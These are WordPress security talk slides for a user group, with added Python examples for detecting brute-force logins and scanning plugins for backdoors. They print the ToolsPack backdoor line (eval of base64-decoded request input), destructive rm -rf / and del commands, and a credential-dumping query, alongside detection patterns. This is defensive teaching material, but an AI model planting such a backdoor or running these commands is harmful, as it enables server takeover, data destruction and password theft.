Intro to WordPress Security
Prepared for the Oklahoma City WordPress User Group by Chris Dodds
Chris Dodds, Owner & Principal Advisor at Focusfire IT Strategy & Consulting
Features: Ten+ years of experience across multiple industries and IT disciplines.
Certifications: CISSP, MCITP:SA, Security+, Network+
System Requirements: Food, water, & internet connectivity.
This talk is not about the top 5 WP security threats.
Password Attacks
- Exploit weak passwords
- Dictionary based
- Can be entirely automated
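Because dictionary attacks against wp-login.php are automated, they leave a very recognizable trace in the web server's access log: many POSTs to the login page from one address in a short window. The script below is an added example (not part of the talk) that parses a few constructed Apache combined-format log lines and flags addresses with a burst of failed logins. It relies on one heuristic, labelled in the code, that a failed WordPress login re-renders the form with HTTP 200 while a successful one redirects with 302; the threshold and window are assumptions you would tune for your site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines (Apache combined format); not real traffic.
# 203.0.113.7 hammers wp-login.php six times in six seconds, all answered with 200.
# 198.51.100.4 logs in once successfully (302 then lands on /wp-admin/).
# 192.0.2.9 fails once, which is normal user behaviour and should not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2012:14:02:01 -0500] "POST /wp-login.php HTTP/1.1" 200 3150 "-" "python-requests/1.0"
203.0.113.7 - - [10/Mar/2012:14:02:02 -0500] "POST /wp-login.php HTTP/1.1" 200 3150 "-" "python-requests/1.0"
203.0.113.7 - - [10/Mar/2012:14:02:03 -0500] "POST /wp-login.php HTTP/1.1" 200 3150 "-" "python-requests/1.0"
203.0.113.7 - - [10/Mar/2012:14:02:04 -0500] "POST /wp-login.php HTTP/1.1" 200 3150 "-" "python-requests/1.0"
203.0.113.7 - - [10/Mar/2012:14:02:05 -0500] "POST /wp-login.php HTTP/1.1" 200 3150 "-" "python-requests/1.0"
203.0.113.7 - - [10/Mar/2012:14:02:06 -0500] "POST /wp-login.php HTTP/1.1" 200 3150 "-" "python-requests/1.0"
198.51.100.4 - - [10/Mar/2012:14:03:10 -0500] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2012:14:03:11 -0500] "GET /wp-admin/ HTTP/1.1" 200 12000 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2012:14:05:00 -0500] "POST /wp-login.php HTTP/1.1" 200 3150 "-" "Mozilla/5.0"
"""

# Enough of the combined format to get client IP, timestamp, request line and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m["ip"], "ts": ts, "method": m["method"],
            "path": m["path"], "status": int(m["status"])}


def is_failed_login(ev):
    """Heuristic (assumption): WordPress answers a failed login POST with 200
    (form redisplayed) and a successful one with a 302 redirect."""
    return (ev["method"] == "POST"
            and ev["path"].startswith("/wp-login.php")
            and ev["status"] == 200)


def detect_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: total_failures} for every IP that has at least `threshold`
    failed logins inside any sliding window of length `window`."""
    failures = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and is_failed_login(ev):
            failures[ev["ip"]].append(ev["ts"])

    flagged = {}
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Advance the window start until it spans at most `window`.
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged


if __name__ == "__main__":
    for ip, count in detect_bursts(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {count} failed wp-login.php POSTs in a short window")
```

The same logic runs over a real log with `detect_bursts(open("/var/log/apache2/access.log"))`; pair it with rate limiting or a login-lockout plugin rather than relying on detection alone.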
ToolsPack Plugin
toolspack.php

    <?php
    /*
    Plugin Name: ToolsPack
    Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
    Version: 1.2
    Author: Mark Stain
    Author URI: http://checkWPTools.com/
    */
    $_REQUEST[e] ? EVAL( base64_decode( $_REQUEST[e] ) ) : exit;
    ?>

Source - http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html
This backdoor code allows the remote user to:
- Execute commands on your server:
    $WINDIR ? `del /F/S/Q $WINDIR*` : `rm -rf /`;
- Execute commands against your WP database:
    SELECT login + - + password FROM users
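The two slides above show what makes this plugin a backdoor: a single line that takes whatever arrives in a request parameter, base64-decodes it and hands it to eval(), so any PHP (including shell commands via backticks) can be run on the server. As an added example that is not from the talk or from Sucuri's post, here is a small Python indicator scanner that walks a plugins directory and flags exactly those traits. The ToolsPack payload line and a benign plugin are embedded as constructed samples, and the pattern names are my own.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample: the ToolsPack payload line from the slide, inside a plugin header.
TOOLSPACK_SAMPLE = r"""<?php
/*
Plugin Name: ToolsPack
Version: 1.2
*/
$_REQUEST[e] ? EVAL( base64_decode( $_REQUEST[e] ) ) : exit;
?>"""

# Constructed sample: a harmless plugin that should produce no findings.
BENIGN_SAMPLE = r"""<?php
/*
Plugin Name: Hello Example
*/
function hello_example_footer() { echo esc_html('Hello'); }
add_action('wp_footer', 'hello_example_footer');
?>"""

# Indicator patterns (hypothetical names), derived from the traits of the sample:
#  1. eval()/assert() wrapped directly around a decoder such as base64_decode()
#  2. eval()/assert() whose argument reaches into $_REQUEST/$_GET/$_POST/$_COOKIE
#  3. shell execution via backticks or system-style functions
PATTERNS = {
    "eval_of_decoded_input": re.compile(
        r"\b(eval|assert)\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
        re.IGNORECASE),
    "eval_of_request_var": re.compile(
        r"\b(eval|assert)\s*\(.*\$_(REQUEST|GET|POST|COOKIE)\b",
        re.IGNORECASE),
    "shell_execution": re.compile(
        r"(`[^`\n]+`|\b(system|shell_exec|passthru|exec|popen)\s*\()",
        re.IGNORECASE),
}


def scan_source(source):
    """Return a list of (line_number, indicator_name) for every matching line."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in PATTERNS.items():
            if pattern.search(line):
                hits.append((lineno, name))
    return hits


def scan_tree(root):
    """Scan every .php file under root; map POSIX relative path -> hits (only files with hits)."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_source(path.read_text(errors="replace"))
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


def demo():
    """Write both constructed samples into a temporary plugins directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "toolspack").mkdir()
        (root / "toolspack" / "toolspack.php").write_text(TOOLSPACK_SAMPLE)
        (root / "hello").mkdir()
        (root / "hello" / "hello.php").write_text(BENIGN_SAMPLE)
        return scan_tree(root)


if __name__ == "__main__":
    for rel_path, hits in demo().items():
        for lineno, name in hits:
            print(f"{rel_path}:{lineno}: {name}")
```

Point `scan_tree()` at `wp-content/plugins` to review a real install. Expect some false positives (legitimate plugins do call exec() or system()), so treat a hit as a prompt to read the file, and treat `eval_of_request_var` in particular as a strong signal.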